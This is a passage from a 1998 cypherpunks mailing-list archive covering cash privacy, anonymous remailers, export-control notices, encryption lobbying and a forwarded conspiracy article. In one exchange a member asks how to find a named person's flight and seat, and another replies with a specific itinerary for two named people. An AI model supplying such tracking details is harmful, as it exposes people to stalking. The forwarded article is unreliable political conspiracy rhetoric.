1994, when he acknowledged on May 8, 1994, that he had had ``a dozen
conversations with Mrs. Jones over the past two months.'' He furthermore
admitted that ``I happened to be present at a strategy meeting last
month on a boat on the Arkansas River,'' at which Jones's attorney ``was
weighing the pros and cons of legal action.''

It doesn't ``matter all that much whether Mrs. Jones ultimately wins or
loses her case,'' he wrote on May 15, 1994. ``The ticking time bomb in
the lawsuit lies elsewhere, in the testimony of other witnesses.''

``Put plainly,'' Evans-Pritchard blurted, ``the political purpose of the
Jones lawsuit is to reconstruct the inner history of the Arkansas
Governor's Mansion, using the legal power of discovery. In effect, the
two lawyers and their staff could soon be doing the job that the
American media failed to do during the election campaign and have
largely failed to do since.''

Evans-Pritchard's motive, in contrast to Jones's ``sheer rage,'' is a
deep, abiding hatred of the United States, and particularly, the
institution of its Presidency. Anyone who joins Evans-Pritchard in this
unfolding assault upon the Presidency, is joining the ranks of traitor
Aaron Burr.

A thorough probe of the current insurrection, beginning with a spotlight
on Linda Tripp, is more than appropriate.

>From Executive Intelligence Review V25, #5.
-- 
         John Covici
          covici@ccs.covici.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 2 Feb 1998 14:56:29 +0800
To: Tim May <tcmay@got.net>
Subject: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <v03007800b0fa45848f51@[207.172.146.231]>
Message-ID: <3.0.3.32.19980202005111.006c10d0@schloss.li>
MIME-Version: 1.0
Content-Type: text/plain



Mr. May said:

>Suffice it to say that I find nearly all cases where someone is "demanding"
>personal information to be cases where the government has required them to,
>for various unseemly purposes, or in cases where credit is being arranged.

Of late I tried to pay off a rather large American Express bill.

Suddenly, AMEX won't take cash in excess of $1,000 in any single billing
period (30 days).  The large sign on the wall indicated the substance of
the new rule (or the old rule newly enforced) and added that customers "may
be required to produce two forms of identification including a government
issued identification card and a social security number."  Here's a
situation where the payor is (theoretically) positively identified to the
payee (including ssn), where credit has already been established, and where
records are certain to exist for all transactions which are being paid for.
 The AMEX Corporate card was once a wonderful tool to preserve anonymity
with.  One could issue several cards for a domestic company, 100% owned by
an offshore, and settle in cash.  Properly done, this was perfectly legal.
Well, once upon a time anyhow.

I find it extremely alarming that a general transaction like this can be
illegal where almost no case can be made for a danger of money laundering
or some kind of support of the "underground economy" (except perhaps that
I'd have Pablo Escobar pay off my Amex to compensate me for my illegal
smuggling flights, but that's a bit thin in my view).

Increasingly, I try and find explanations for these kinds of regulations
which do not include a paranoid rant about governments making sure they
maintain a firm set of records on every citizen for whenever it might be
"needed," (or wanted).  Increasingly, this becomes a difficult mental task.

Increasingly, it is difficult to make cash transactions.  In the end that
seems to be the point.  Make it difficult to pay with cash.  Make it
suspicious to pay with cash.  Make it an attention getter if you pay with
cash.

Sound paranoid?  Try this.  I'd like everyone who reads this to try and go
45 days without using plastic or writing a check.  Just 45 days.  If you
don't grow alarmist very quickly (like in the first week) I'd like to hear
your experience.  If nothing else, try adding up a few months of finance
charges, yearly fees on your credit cards, transactions fees, check fees,
interest lost on no-interest checking accounts... see what you're paying to
keep people from looking at you like a criminal.

There's an interesting new awakening in personal finance right now which
advises, among other things, "pay in cash, die broke."  I'm interested to
see how this "pay in cash" advice, which I have followed religiously years
before it was put in print, clashes with post-modern financial regulation.

I know things have gotten really out of hand because the phrase "No, I'll
pay with cash," which I find I have to use more and more often, turns more
and more heads and is met more and more often with a cross look from a
teller and a finger pointed at a large sign bearing the heading
"Restrictions on Cash Transactions."

When the question becomes "Which credit card will you be paying with?" and
no longer does one hear "How will you be paying for that?" I think people
better start thinking about what's happening.

(I'm not on cypherpunks anymore, mail me directly).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric-grey@usa.net
Date: Mon, 2 Feb 1998 09:22:45 +0800
To: cypherpunks-unedited@toad.com
Subject: Would you like to join our referral program?
Message-ID: <199802012012.e-mail@sparklers.com>
MIME-Version: 1.0
Content-Type: text/plain




Hello 

I saw your web site, which was featured on the New Business Sites
at Starting Point.  I was wondering if you might be interested in
participating in our referral program.  All you have to do is put our
banner or text link on your page.  We pay you $50 for every 
click-thru that signs up for a business credit card merchant
account with us.  If interested please visit:

http://www.tou.com/host/mken/referal.htm

Thank you.

Marc Kenyon
21st Century Resources







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 2 Feb 1998 15:09:37 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: The Continued Attack on Cash (Was: "The Right of Anonymity"...) (fwd)
Message-ID: <199802020709.BAA27402@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 02 Feb 1998 00:51:11 -0600
> From: Black Unicorn <unicorn@schloss.li>
> Subject: The Continued Attack on Cash (Was: "The Right of Anonymity"...)

> Sound paranoid?  Try this.  I'd like everyone who reads this to try and go
> 45 days without using plastic or writing a check.  Just 45 days.  If you
> don't grow alarmist very quickly (like in the first week) I'd like to hear
> your experience.

I've been doing it for many years. Don't have a checking account, don't own
a credit card. I do have a saving account with a local credit union and
go in every 3-4 days and withdraw what I need for the next 3-4 days. Pay
every bill in cash or money order. I'm not going into how I invest my
excess capital. If my employer needs me to travel I do it on their plastic.
The only irritating thing I find is that I can't walk into grocery stores any
more and get money orders larger than $700 and many won't do it for more than
$400. I have to pay my rent each month with a $400 and a $397 money order in
order to meet the $797 amound due because I'm too lazy to drive the extra
6-8 blocks to the one who will do the $700 money orders. Other than that I
don't have a problem at all.

I'm going to go tomorrow and buy a new laptop at around $1500. I intend on
paying with a wad of $100 bills. Bet you they don't look twice nor will they
ask for ID.

I've actualy never had a problem paying cash, never had anyone turn real
money down...


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 2 Feb 1998 23:01:14 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199802021450.GAA00175@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash middle latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord ?";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{"cracker"} = "<remailer@anon.efga.org> cpunk mix remix pgp hash ksub esub latent cut ek reord post";
$remailer{'redneck'} = '<config@anon.efga.org> newnym pgp';
$remailer{"bureau42"} = "<remailer@bureau42.ml.org> cpunk mix pgp ksub hash latent cut ek";
$remailer{"neva"} = "<remailer@neva.org> cpunk pgp pgponly hash cut ksub ?";
$remailer{"lcs"} = "<mix@anon.lcs.mit.edu> mix";
$remailer{"medusa"} = "<medusa@weasel.owl.de> mix middle"
$remailer{"McCain"} = "<mccain@notatla.demon.co.uk> mix middle";
$remailer{"valdeez"} = "<valdeez@juno.com> cpunk pgp pgponly hash ek";
$remailer{"arrid"} = "<arrid@juno.com> cpunk pgp pgponly hash ek";
$remailer{"hera"} = "<goddesshera@juno.com> cpunk pgp pgponly hash ek";
$remailer{"htuttle"} = "<h_tuttle@rigel.cyberpass.net> cpunk pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix reno winsock)
(weasel squirrel medusa)
(cracker redneck)
(nym lcs)
(valdeez arrid hera)

This remailer list is somewhat phooey. Go check out
http://www.publius.net/rlist.html for a good one.

Last update: Thu 23 Oct 97 15:48:06 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hera     goddesshera@juno.com             ------------  5:03:45  99.86%
nym      config@nym.alias.net             +*#**#**###       :34  95.82%
redneck  config@anon.efga.org             #*##*+#****      2:00  95.44%
mix      mixmaster@remail.obscura.com     +++ ++++++*     19:18  95.27%
squirrel mix@squirrel.owl.de              -- ---+---    2:34:19  95.16%
cyber    alias@alias.cyberpass.net        *++***+ ++      11:26  95.11%
replay   remailer@replay.com              ****   ***      10:06  94.93%
arrid    arrid@juno.com                   ----.------   8:50:34  94.41%
bureau42 remailer@bureau42.ml.org          ---------    3:38:29  93.53%
cracker  remailer@anon.efga.org           +  +*+*+*+      16:32  92.80%
jam      remailer@cypherpunks.ca          +  +*-++++      24:14  92.79%
winsock  winsock@rigel.cyberpass.net      -..-..----    9:59:18  92.22%
neva     remailer@neva.org                ------****+   1:03:02  90.39%
valdeez  valdeez@juno.com                               4:58:22 -36.97%
reno     middleman@cyberpass.net                        1:01:28  -2.65%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Feb 1998 20:57:16 +0800
To: cypherpunks@toad.com
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...) (
In-Reply-To: <199802020709.BAA27402@einstein.ssz.com>
Message-ID: <qwX0Je18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
>                                    Don't have a checking account, don't own
> a credit card.

Minor nit: most people who do use credit cards don't "own" them either.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 3 Feb 1998 00:01:27 +0800
To: cypherpunks@toad.com
Subject: Re: Bush Gang Suspected In Assault On Presidency
In-Reply-To: <34cae887.ccs@ccs.covici.com>
Message-ID: <3.0.5.32.19980202074638.00875dd0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



EIR is one of the mouthpieces for the Lyndon Larouche cult.
I ran across them in an airport recently, and was surprised to find
they're now strongly behind Bill Clinton; I'd thought that a few
years ago they were accusing him of being a tool of the
Tri-Lateral Commission, though perhaps it was some other group
of anti-TriLateralists.

At 10:22 PM 2/1/98 EST, covici@ccs.covici.com wrote:
>Bush gang suspected in new assault on Presidency
>
>by Edward Spannaus and Jeffrey Steinberg
>
>In the midst of the worst global financial crisis in modern history, the
>United States Presidency has come under renewed, vicious attack from a
>combination of British and nominally ``American'' Bush-League circles.
...
>From Executive Intelligence Review V25, #5.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 2 Feb 1998 20:57:45 +0800
To: cypherpunks@toad.com
Subject: BXA Meet
Message-ID: <1.5.4.32.19980202124909.010275c4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Should anyone attend this a report would be welcome.

Federal Register: February 2, 1998 (Volume 63, Number 21)
Page 5353
-----------------------------------------------------------------------

DEPARTMENT OF COMMERCE

Bureau of Export Administration

Regulations and Procedures Technical Advisory Committee; Notice
of Partially Closed Meeting

    A meeting of the Regulations and Procedures Technical Advisory
Committee will be held February 25, 1998, 9:00 a.m., in the Herbert C.
Hoover Building, Room 3884, 14th Street between Constitution and
Pennsylvania Avenues, N.W., Washington, D.C. The Committee
advises the Office of the Assistant Secretary for Export Administration 
on implementation of the Export Administration Regulations (EAR) 
and provides for continuing review to update the EAR as needed.

Agenda

Open Session

    1. Opening remarks by the Chairperson.
    2. Presentation of papers or comments by the public.
    3. Update on implementation of the National Defense Authorization
Act computer control regulations.
    4. Update on the Wassenaar Arrangement implementation regulation.
    5. Discussion on the ``deemed export'' rule.
    6. Discussion on the encryption regulations.
    7. Update on the License Process Review initiative.
    8. Discussion on efforts to conform the Foreign Trade Statistics
Regulations and the Export Administration Regulations on export
clearance requirements.
    9. Discussion on clarification of EPCI (Enhanced Proliferation
Control Initiative).

Closed Session

    10. Discussion of matters properly classified under Executive Order
12958, dealing with the U.S. export control program and strategic
criteria related thereto.

    The General Session of the meeting will be open to the public and a
limited number of seats will be available. To the extent that time
permits, members of the public may present oral statements to the
Committee. Written statements may be submitted at any time before or
after the meeting. However, to facilitate the distribution of public
presentation materials to the Committee members, the Committee 
suggests that presenters forward the public presentation materials 
two weeks prior to the meeting date to the following address: Ms. 
Lee Ann Carpenter, OAS/EA/BXA MS:3886C, 14th & Pennsylvania 
Avenue, N.W., U.S. Department of Commerce, Washington, D.C. 
20230.

    The Assistant Secretary for Administration, with the concurrence of
the delegate of the General Counsel, formally determined on December
16, 1996, pursuant to Section 10(d) of the Federal Advisory Committee
Act, as amended, that the series of meetings or portions of meetings of
the Committee and of any Subcommittees thereof, dealing with the
classified materials listed in 5 U.S.C. 552b(c)(1) shall be exempt from
the provisions relating to public meetings found in section 10(a) (1)
and (a) (3), of the Federal Advisory Committee Act. The remaining
series of meetings or portions thereof will be open to the public. A
copy of the Notice of Determination to close meetings or portions of
meetings of the Committee is available for public inspection and
copying in the Central Reference and Records Inspection Facility, Room
6020, U.S. Department of Commerce, Washington, D.C. For further
information, call Lee Ann Carpenter at (202) 482-2583.

    Dated: January 27, 1998.
Lee Ann Carpenter,
Director, Technical Advisory Committee Unit.
[FR Doc. 98-2393 Filed 1-30-98; 8:45 am]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 2 Feb 1998 21:48:25 +0800
To: cypherpunks@toad.com
Subject: Jim Bell Update
Message-ID: <1.5.4.32.19980202134213.01035a0c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Sun, 01 Feb 1998

Hi, John.   Received a letter and phone call from Jim, as below.

--------------------------------------

.   He had a little altercation with a fellow prisoner ("through no fault
of my own" - he thinks he was set up) and his privileges were reduced for
35 days, so that he could only make one phone call each week.

.   In reference to the bad publicity (all those articles and news alerts)
which his case received, he speculates that the government gave a copy of
AP to a 'think tank' like Rand, etc., with the request to figure out how to
stop or delay AP. But it is his conclusion that AP is unstoppable, although:

"I think that one last (temporary) hope for government is to delay AP.
Chances are good that the "think tank" decided thatt the best way to delay
AP is to discredit me, its author.  It was a desperate gamble, particularly
because the act of harrassing me automatically gives AP more publicity.
That's the reason they will fail; the more they try to "get" me, the worse
it will be for them."

He wants it noted that his writing and discussions of AP ideas are in the
sense of a "prediction", a "warning", or even a "vision", not an advocacy
of it.

.   Regarding his guilty plea, he said it was because he realizes that he
did do a few things wrong and that, although he did think that some of the
charges against him were overblown and distorted, there was enough of a
risk of being found guilty that it didn't make a lot of sense to contest
them.  He adds, "I also felt (and still do, of course) that government had
already 'lost the war' so to speak."

.   He expects to be out around mid-April. Upon his release he wants to
go to some of his favorite restaurants, and to have several BIG pizzas.  He
hopes he can get his old job back as electronics designer, and has some
ideas he wants to work on for a virtual reality peripheral device which
will bring everyone steps closer to the Star Trek Next Generation 'holodek'.

- end






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 2 Feb 1998 23:09:01 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Clarke denies pedophilia [CNN]
Message-ID: <199802021507.JAA28167@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    
>                    AUTHOR OUTRAGED AT REPORT HE IS PEDOPHILE
>                                        
>   Arthur C. Clarke seeks postponement of knighthood
>   
>       Clarke Clarke 
>      
>      COLOMBO, Sri Lanka (AP) -- A British newspaper report that Arthur C.
>      Clarke is a pedophile is false, his spokesman said Monday, and the
>      science fiction writer is consulting lawyers.
>      
>      "I am outraged by the Sunday Mirror's allegations, and I am seeking
>      legal advise," Clarke said in a brief statement read to reporters by
>      his secretary, Roshan Amarasekhara.
>      
>      "Mr. Clarke is very upset by the false reports," Amarasekhara added.
>      
>      Clarke was quoted at length discussing sex with young men in the
>      sensationalist British newspaper's report Sunday, a day before
>      Prince Charles was to fly to Sri Lanka to confer the honorary
>      knighthood Queen Elizabeth granted the author late last year. The
>      prince will also take part in the former British colony's 50th
>      independence anniversary celebrations.
>      


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 3 Feb 1998 01:53:52 +0800
To: cypherpunks@toad.com
Subject: A new crypto-campaign, from Time/Netly News
Message-ID: <Pine.GSO.3.95.980202093143.14526B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Mon, 2 Feb 1998 12:07:24 -0500
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu

*****

SHOULD THE GOVERNMENT READ YOUR CYBERMAIL?

Time Magazine
February 9, 1998
Page 20

A few years ago, ED GILLESPIE was busy orchestrating the
Republican takeover of Congress as the G.O.P.'s top
spinmeister. Now the man behind the Contract with America
is shifting to high tech as he battles a new foe: a plan to
ban software capable of encoding messages so securely that
police can't crack them. A law proposed by the FBI would
mandate an electronic peephole in all encryption programs
so that government agents can read your files. The FBI
claims this is necessary to protect against criminals. But
Silicon Valley chiefs see this as a threat, and are
equipping Gillespie with a multimillion-dollar lobbying and
media budget. Joining him to woo Democrats is lobbyist JACK
QUINN, former counsel to Bill Clinton and ex-chief of staff
to Al Gore.

--By Declan McCullagh/Washington

**********

For details on the new encryption campaign, check out today's Netly News
(netlynews.com) at:

  http://cgi.pathfinder.com/netly/opinion/0,1042,1722,00.html

-Declan


--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Mon, 2 Feb 1998 22:39:06 +0800
To: unicorn@schloss.li
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <3.0.3.32.19980202005111.006c10d0@schloss.li>
Message-ID: <a376e556b810713007e9423ce0a90627@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn wrote:

> Sound paranoid?  Try this.  I'd like everyone who reads this to try and go
> 45 days without using plastic or writing a check.  Just 45 days.  If you
> don't grow alarmist very quickly (like in the first week) I'd like to hear
> your experience.  If nothing else, try adding up a few months of finance
> charges, yearly fees on your credit cards, transactions fees, check fees,
> interest lost on no-interest checking accounts... see what you're paying to
> keep people from looking at you like a criminal.

Depends on where you shop.  I was recently at a store where my request
to pay with a credit card instead of cash elicited a look of disappointment
from the owner-operator.  Normally I'd have been happy to accomodate his
desire for cash, but when someone else is letting you charge it to their
credit card... well...

I think the real problem is dealing with big companies who want you name,
address, and phone number for their marketing dept.  Mom and pop shops
would much prefer to cut out the middleman.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Mon, 2 Feb 1998 22:48:26 +0800
To: "'cypherpunks@toad.com
Subject: RE: Dr Dobbs crypto CD
Message-ID: <6B5344C210C7D011835C0000F80127668B1610@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



I called them up a couple weeks ago to ask about this. The person I
talked to
had clearly fielded this question quite a few times. The story he gave
is that
preparation of the master CD was farmed out to some particular
individual
contractor who was stalling. I got the impression that I was being told
that
the contractor was apparently imcompetant, and could not turn in a
usable
master in a timely fashion.

There was also some mention of the possiblity of 'legal difficulties',
though
I was given no details on that.

Peter Trei
ptrei@securitydynamics.com


> -----Original Message-----
> From:	dlv@bwalk.dm.com [SMTP:dlv@bwalk.dm.com]
> Sent:	Saturday, January 31, 1998 12:14 PM
> To:	cypherpunks@toad.com
> Subject:	Dr Dobbs crypto CD
> 
> The DDJ I just got (March 98) has a full-page ad for the crypto CD
> (p.113)
> saying inter alia "New Release! fast Search Engine"
> 
> Has anyone received even the "old release"?
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013,
> 14.4Kbps
	[Trei, Peter]  
I called them up a couple weeks ago to ask about this. The person I
spoke to
had clearly fielded this question quite a few times. The story he gave
is that
preparation of the master CD was farmed out to some particular
individual
contractor who was stalling. I got the impression that I was being told
that
the contractor was apparently imcompetant, and could not turn in a
usable
master in a timely fashion.

There was also some mention of the possiblity of 'legal difficulties',
though
I was given no details.

I'm still waiting for my copy.

Peter Trei
ptrei@securitydynamics.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 3 Feb 1998 02:27:41 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: The Continued Attack on Cash (Was: "The Right ofAnonymity"...)
In-Reply-To: <v03102802b0fb087b0a22@[207.167.93.63]>
Message-ID: <v03102801b0fbbc4d4735@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:51 PM -0800 2/1/98, Black Unicorn wrote:
>Mr. May said:
>
>>Suffice it to say that I find nearly all cases where someone is "demanding"
>>personal information to be cases where the government has required them to,
>>for various unseemly purposes, or in cases where credit is being arranged.
>
>Of late I tried to pay off a rather large American Express bill.
>
>Suddenly, AMEX won't take cash in excess of $1,000 in any single billing
>period (30 days).  The large sign on the wall indicated the substance of
....


It's worth noting (again) that a very simple technological/social solution
to the "credit card companies have records on people" problem, the one
often cited by "privacy law advocates" as the reason for a Data Privacy
Act, is easily found.

Namely, remove any impediments to the issuance of credit or debit cards
unlinkable to the True Name of a user.  A card issuer could feature this as
a Privacy Card, either backed by transfers of backing capital to accounts,
or using Chaum-style methods.

This is fully feasible using Chaumian credential-revealing mechanisms. (Cf.
Chaum's seminal "Transaction Systems to Make Big Brother Obsolete," in
Communications of the ACM, November 1985. Updated a few times and available
in reprints or other places. Try search engines for latest locations.)

However, the trends are in just the opposite direction, as both Black
Unicorn and Bill Stewart have noted in this thread. Between the War on
Drugs, the laws about money laundering, the fears of tax evasion, and the
general burrowcrat desire to record the movements and actions of
citizen-units, such a Privacy Card would be frowned-upon.

Various roadblocks, ranging from "know your customer" restrictions on banks
to anti-money-laundering laws, would be thrown up to stop any such Privacy
Card.

The real solution is easy.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 3 Feb 1998 02:34:10 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: Airline ticket information -- help
In-Reply-To: <v03007803b0fbb8956451@[168.161.105.216]>
Message-ID: <v03102802b0fbbf3bf77c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:55 AM -0800 2/2/98, Declan McCullagh wrote:
>I'm trying to find out what airline flight someone is taking. I have a name
>and know the general travel plans and likely date. How can I find out the
>airline, flight number, and seat number? This is somewhat urgent. (You have
>my assurance that the purpose is legit.)
>
>If anyone has any ideas, I'd appreciate the help.

Monica Lewinski and William Ginsburg are travelling on American Airlines
Flight 420 on Wednesday, 4 February, departing Dulles Airport at 10:45
a.m., EST, and arriving LAX at 3:35 p.m., PST.

Good luck reporting on them, Declan!


--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 3 Feb 1998 02:42:33 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Airline ticket information -- help
In-Reply-To: <v03102802b0fbbf3bf77c@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980202102735.27852D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Hah! Assuming this IS what I'm trying to get (and confidentiality binds me
from saying if it is or not), you didn't post the seat number. 

Keep sleuthing, Inspector May!

-Declan


On Mon, 2 Feb 1998, Tim May wrote:

> At 9:55 AM -0800 2/2/98, Declan McCullagh wrote:
> >I'm trying to find out what airline flight someone is taking. I have a name
> >and know the general travel plans and likely date. How can I find out the
> >airline, flight number, and seat number? This is somewhat urgent. (You have
> >my assurance that the purpose is legit.)
> >
> >If anyone has any ideas, I'd appreciate the help.
> 
> Monica Lewinski and William Ginsburg are travelling on American Airlines
> Flight 420 on Wednesday, 4 February, departing Dulles Airport at 10:45
> a.m., EST, and arriving LAX at 3:35 p.m., PST.
> 
> Good luck reporting on them, Declan!
> 
> 
> --Tim May
> 
> The Feds have shown their hand: they want a ban on domestic cryptography
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^2,976,221   | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vicente Silveira <vicente@certisign.com.br>
Date: Mon, 2 Feb 1998 21:26:06 +0800
To: jya@pipeline.com
Subject: Re: More on ISDN Features
In-Reply-To: <1.5.4.32.19980130235837.0072cee4@pop.pipeline.com>
